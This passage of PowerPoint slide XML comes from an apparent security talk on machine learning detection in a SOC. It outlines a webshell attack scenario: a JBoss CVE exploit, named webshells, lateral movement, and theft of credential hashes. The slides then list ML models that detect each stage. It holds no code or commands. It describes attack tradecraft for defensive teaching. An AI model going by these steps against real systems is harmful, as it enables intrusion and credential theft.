          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="51426" tIns="25713" rIns="51426" bIns="25713" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9144">
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="95000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use Case: Webshell on DMZ Asset</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4731252" y="1231490"/>
            <a:ext cx="3111910" cy="267372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="51426" tIns="25713" rIns="51426" bIns="25713" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9144">
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="95000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ML Evidence Fusion </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1922685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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507937" y="1723849"/>
            <a:ext cx="3680782" cy="2824790"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Exploit JBOSS vulnerability (CVE-2010-0738/ CVE-2013-4810) at exposed web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Attacker uploads lightweight </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t> on compromised server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>jbossinvoker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>zecmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Beachhead established and trust relationship exploited from DMZ to LAN asset using in memory malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Domain Controller is attacked and LDAP directory and credential hashes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>exfiltrated</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="235635"/>
            <a:ext cx="9143999" cy="471268"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ML Security Use Cases</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4731252" y="1723849"/>
            <a:ext cx="3680782" cy="2824790"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Exploit chain model analyzes new traffic for 0-days and deliveries of malicious payload (https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>jzadeh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/Aktaion)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Asset discovery model monitors for changes in the asset graph and dynamically detects assets acting out of band from their peer group</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Beacon model analyzes communication for C2 patterns even when asynchronous or over small periods of activity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750" defTabSz="512763">
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>AD Tree model detects admin credentials performing out of band sequence of behavior</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Shape 153" descr="Screen Shot 2017-03-24 at 8.58.18 AM.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2728972" y="4065204"/>
            <a:ext cx="1843028" cy="966869"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412954" y="1231490"/>
            <a:ext cx="3910953" cy="267372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="51426" tIns="25713" rIns="51426" bIns="25713" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9144">
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="95000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use Case: Webshell on DMZ Asset</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4731252" y="1231490"/>
            <a:ext cx="3111910" cy="267372"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="51426" tIns="25713" rIns="51426" bIns="25713" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9144">
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent4">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buSzPct val="95000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ML Evidence Fusion </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1570762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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="235635"/>
            <a:ext cx="9143999" cy="471268"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example Of ML Solution In The SOC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="249623" y="3136244"/>
            <a:ext cx="8644753" cy="1364961"/>
            <a:chOff x="274311" y="2048765"/>
            <a:chExt cx="8644753" cy="1364961"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Freeform 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="274311" y="2048765"/>
              <a:ext cx="2274935" cy="1364961"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2274935"/>
                <a:gd name="connsiteY0" fmla="*/ 136496 h 1364961"/>
                <a:gd name="connsiteX1" fmla="*/ 136496 w 2274935"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1364961"/>
                <a:gd name="connsiteX2" fmla="*/ 2138439 w 2274935"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 1364961"/>
                <a:gd name="connsiteX3" fmla="*/ 2274935 w 2274935"/>
                <a:gd name="connsiteY3" fmla="*/ 136496 h 1364961"/>
                <a:gd name="connsiteX4" fmla="*/ 2274935 w 2274935"/>
                <a:gd name="connsiteY4" fmla="*/ 1228465 h 1364961"/>
                <a:gd name="connsiteX5" fmla="*/ 2138439 w 2274935"/>
                <a:gd name="connsiteY5" fmla="*/ 1364961 h 1364961"/>
                <a:gd name="connsiteX6" fmla="*/ 136496 w 2274935"/>
                <a:gd name="connsiteY6" fmla="*/ 1364961 h 1364961"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2274935"/>
                <a:gd name="connsiteY7" fmla="*/ 1228465 h 1364961"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 2274935"/>
                <a:gd name="connsiteY8" fmla="*/ 136496 h 136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935" h="1364961">
                  <a:moveTo>
                    <a:pt x="0" y="136496"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="61111"/>
                    <a:pt x="61111" y="0"/>
                    <a:pt x="136496" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2138439" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2213824" y="0"/>
                    <a:pt x="2274935" y="61111"/>
                    <a:pt x="2274935" y="136496"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2274935" y="1228465"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2274935" y="1303850"/>
                    <a:pt x="2213824" y="1364961"/>
                    <a:pt x="2138439" y="1364961"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="136496" y="1364961"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="61111" y="1364961"/>
                    <a:pt x="0" y="1303850"/>
                    <a:pt x="0" y="1228465"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="136496"/>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12368" tIns="112368" rIns="112368" bIns="112368" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="l" defTabSz="844550" rtl="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1900" b="0" i="0" kern="1200" dirty="0" smtClean="0"/>
                <a:t>Exploitation</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1900" kern="1200" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="666750" rtl="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" kern="1200" dirty="0" smtClean="0"/>
                <a:t>Webserver is compromised by remote code execution vulnerability</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1500" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2776739" y="2449154"/>
              <a:ext cx="482286" cy="564183"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 482286"/>
                <a:gd name="connsiteY0" fmla="*/ 112837 h 564183"/>
                <a:gd name="connsiteX1" fmla="*/ 241143 w 482286"/>
                <a:gd name="connsiteY1" fmla="*/ 112837 h 564183"/>
                <a:gd name="connsiteX2" fmla="*/ 241143 w 482286"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 564183"/>
                <a:gd name="connsiteX3" fmla="*/ 482286 w 482286"/>
                <a:gd name="connsiteY3" fmla="*/ 282092 h 564183"/>
                <a:gd name="connsiteX4" fmla="*/ 241143 w 482286"/>
                <a:gd name="connsiteY4" fmla="*/ 564183 h 564183"/>
                <a:gd name="connsiteX5" fmla="*/ 241143 w 482286"/>
                <a:gd name="connsiteY5" fmla="*/ 451346 h 564183"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 482286"/>
                <a:gd name="connsiteY6" fmla="*/ 451346 h 564183"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 482286"/>
                <a:gd name="connsiteY7" fmla="*/ 112837 h 56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86" h="564183">
                  <a:moveTo>
                    <a:pt x="0" y="112837"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="241143" y="112837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241143" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482286" y="282092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241143" y="564183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241143" y="451346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="451346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="112837"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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0" tIns="112837" rIns="144686" bIns="112837" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="ctr" defTabSz="711200">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3459220" y="2048765"/>
              <a:ext cx="2274935" cy="1364961"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 2274935"/>
                <a:gd name="connsiteY0" fmla="*/ 136496 h 1364961"/>
                <a:gd name="connsiteX1" fmla="*/ 136496 w 2274935"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1364961"/>
                <a:gd name="connsiteX2" fmla="*/ 2138439 w 2274935"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 1364961"/>
                <a:gd name="connsiteX3" fmla="*/ 2274935 w 2274935"/>
                <a:gd name="connsiteY3" fmla="*/ 136496 h 1364961"/>
                <a:gd name="connsiteX4" fmla="*/ 2274935 w 2274935"/>
                <a:gd name="connsiteY4" fmla="*/ 1228465 h 1364961"/>
                <a:gd name="connsiteX5" fmla="*/ 2138439 w 2274935"/>
                <a:gd name="connsiteY5" fmla="*/ 1364961 h 1364961"/>
                <a:gd name="connsiteX6" fmla="*/ 136496 w 2274935"/>
                <a:gd name="connsiteY6" fmla="*/ 1364961 h 1364961"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 2274935"/>
                <a:gd name="connsiteY7" fmla="*/ 1228465 h 1364961"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 2274935"/>
                <a:gd name="connsiteY8" fmla="*/ 136496 h 136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935" h="1364961">
                  <a:moveTo>
                    <a:pt x="0" y="136496"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="61111"/>
                    <a:pt x="61111" y="0"/>
                    <a:pt x="136496" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2138439" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2213824" y="0"/>
                    <a:pt x="2274935" y="61111"/>
                    <a:pt x="2274935" y="136496"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2274935" y="1228465"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2274935" y="1303850"/>
                    <a:pt x="2213824" y="1364961"/>
                    <a:pt x="2138439" y="1364961"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="136496" y="1364961"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="61111" y="1364961"/>
                    <a:pt x="0" y="1303850"/>
                    <a:pt x="0" y="1228465"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="136496"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
          </p:spPr>
          <p:style>
            <a:lnRef idx="2">
              <a:schemeClr val="lt1">
                <a:hueOff val="0"/>
                <a:satOff val="0"/>
                <a:lumOff val="0"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:lnRef>
            <a:fillRef idx="1">
              <a:schemeClr val="accent5">
                <a:hueOff val="-4666828"/>
                <a:satOff val="0"/>
                <a:lumOff val="10588"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="-4666828"/>
                <a:satOff val="0"/>
                <a:lumOff val="10588"/>
                <a:alphaOff val="0"/>
              </a:schemeClr>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="lt1"/>
            </a:fontRef>
          </p:style>
          <p:txBody>
            <a:bodyPr spcFirstLastPara="0" vert="horz" wrap="square" lIns="112368" tIns="112368" rIns="112368" bIns="112368" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" algn="l" defTabSz="844550" rtl="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="35000"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1900" b="0" i="0" kern="1200" dirty="0" smtClean="0"/>
                <a:t>Expansion</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1900" kern="1200" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="666750" rtl="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="15000"/>
                </a:spcAft>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1500" b="0" i="0" kern="1200" dirty="0" smtClean="0"/>
                <a:t>Attacker finds a set of files and stages them for exfil using email services</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1500" kern="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5961649" y="2449154"/>
              <a:ext cx="482286" cy="564183"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 482286"/>
                <a:gd name="connsiteY0" fmla="*/ 112837 h 564183"/>
                <a:gd name="connsiteX1" fmla="*/ 241143 w 482286"/>
                <a:gd name="connsiteY1" fmla="*/ 112837 h 564183"/>
                <a:gd name="connsiteX2" fmla="*/ 241143 w 482286"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 564183"/>
                <a:gd name="connsiteX3" fmla="*/ 482286 w 482286"/>
                <a:gd name="connsiteY3" fmla="*/ 282092 h 564183"/>
                <a:gd name="connsiteX4" fmla="*/ 241143 w 482286"/>
                <a:gd name="connsiteY4" fmla="*/ 564183 h 564183"/>
                <a:gd name="connsiteX5" fmla="*/ 241143 w 482286"/>
                <a:gd name="connsiteY5" fmla="*/ 451346 h 564183"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 482286"/>
                <a:gd name="connsiteY6" fmla="*/ 451346 h 564183"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 482286"/>
                <a:gd name="connsiteY7" fmla="*/ 112837 h 56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86" h="564183">
                  <a:moveTo>
